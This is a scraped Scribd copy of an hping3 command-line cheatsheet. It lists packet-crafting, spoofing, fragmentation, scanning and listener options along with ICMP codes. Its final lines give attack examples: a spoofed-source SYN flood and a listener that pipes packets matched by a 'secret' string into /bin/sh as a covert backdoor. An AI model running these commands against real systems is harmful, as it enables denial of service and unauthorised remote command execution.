0% found this document useful (0 votes)
2K views

Hping3 Cheatsheet v1.0-EnG

This document provides a summary of command line options for the hping tool, which is used to test TCP/IP networks and host discovery. It lists numerous options for controlling packet types, ports, protocols, flags, fragmentation, spoofing, scanning, listening and more. Security related uses including port scanning, SYN flooding, and creating backdoors are also mentioned.
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
2K views

Hping3 Cheatsheet v1.0-EnG

This document provides a summary of command line options for the hping tool, which is used to test TCP/IP networks and host discovery. It lists numerous options for controlling packet types, ports, protocols, flags, fragmentation, spoofing, scanning, listening and more. Security related uses including port scanning, SYN flooding, and creating backdoors are also mentioned.
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

BASE OPTIONS -q --quiet -v --version -I --interface -V --verbose -D --debug -c --count count response packets -i --interval secs or secs with

u [1] --beep beep every received packet (no icmp) -n --numeric dont resolv -z --bind use ctrl+z to increment TTL -Z --unbind --fase 10 packets / sec --master 1 packet / s --flood as fast as posible COMMON OPTIONS -d --data datasize packet body size -E --file insert into packets data -e --sign signature lenght -j --dump received packets in hex -J --print dump in printable char -B --safe lost pckts will be resend -u --end send EOF when --file -T --traceroute traceroute mode, also:
--tr-keep-ttl --tr-stop --tr-no-rtt --tcpexitcode

keep TTL fixed exit on first not time icmp exceed dont show RTT set exit code to tcpth_flag of last packet

IP RELATED OPTIONS -a --spoof hostname --rand-source --rand-dest host accepts X as wildcard -t --ttl set ttl value -N --id ip id [random] -H --ipprot ip protocol in raw ip mode -W --winid display id replies from win -r --rel id increments -f --frag split packets, [16bytes] -x --morefrag send ICMP time-exceeded -y --dontfrag perform PDMTU -g --fragoff fragment offset value -G --rroute includes RECORD_ROUTE -m --mtu value -o --tos set type of service, on hex ICMP RELATED OPTIONS -C --icmptype default [echo] -K --icmpcode ICMP code [0] --icmp-ipver ip version [4] --icmp-iphlen ip header length [5] --icmp-iplen ip packet lenght [real len] --icmp-ipid set ip id [rand] --icmp-ipproto set ip protocol [tcp] --icmp-cksum set checksum [valid] --icmp-ts timestamp req --icmp-addr mask req

TCP/UDP RELATED OPTIONS -s --baseport [random],+1 on received -p --destport [0] if have, have:
+port ++port increased for each reply increased for each sent

ICMP CODES
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20-29 30 31 32 33 34 35 36 37 38 39 40 41-255 Echo Reply Unassigned Unassigned Destination Unreachable Source Quench Redirect Alternate Host Address Unassigned Echo Router Advertisement Router Selection Time Exceeded Parameter Problem Timestamp Timestamp Reply Information Request Information Reply Address Mask Request Address Mask Reply Reserved (for security) Reserved (Experimental) Traceroute Datagram Conversion Error Mobile Host Redirect IPv6 Where-Are-You IPv6 I-Am-Here Mobile Registration Request Mobile Registration Reply Domain Name Request Domain Name Reply SKIP Photuris Reserved

--keep still source port -w --win set win size [64] -O --tcpoff -b --badchksum -M --setseq -L --setack -Q --seqnum collect seq numbers --tcp-timestamp set timestamp TCP FLAGS -F --fin -S --syn -R --rst -P --push -A --ack -U --urg -X --xmas -Y --ymas PROTOCOL SELECTION -0 --rawip -1 --icmp -2 --ucp -8 --scan with:
group ex: 20-53 comma delimited ex: 1,3,4 known: for /etc/services negated with !ex: 1-53,!4

-9 --listen string match

[?] : default value

SecurityByDefault.com

Uptime: hping2 -p 80 -S --tcp-timestamp host PortScan: hping I eth0 --scan 20-25,80,443 -S host Synflood: hping p 80 i u10000 a source S host S hping3 -I eth1 -9 secret | /bin/sh Backdoor: C hping3 -R ip -e secret -E command_file -d 100 -c 1

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy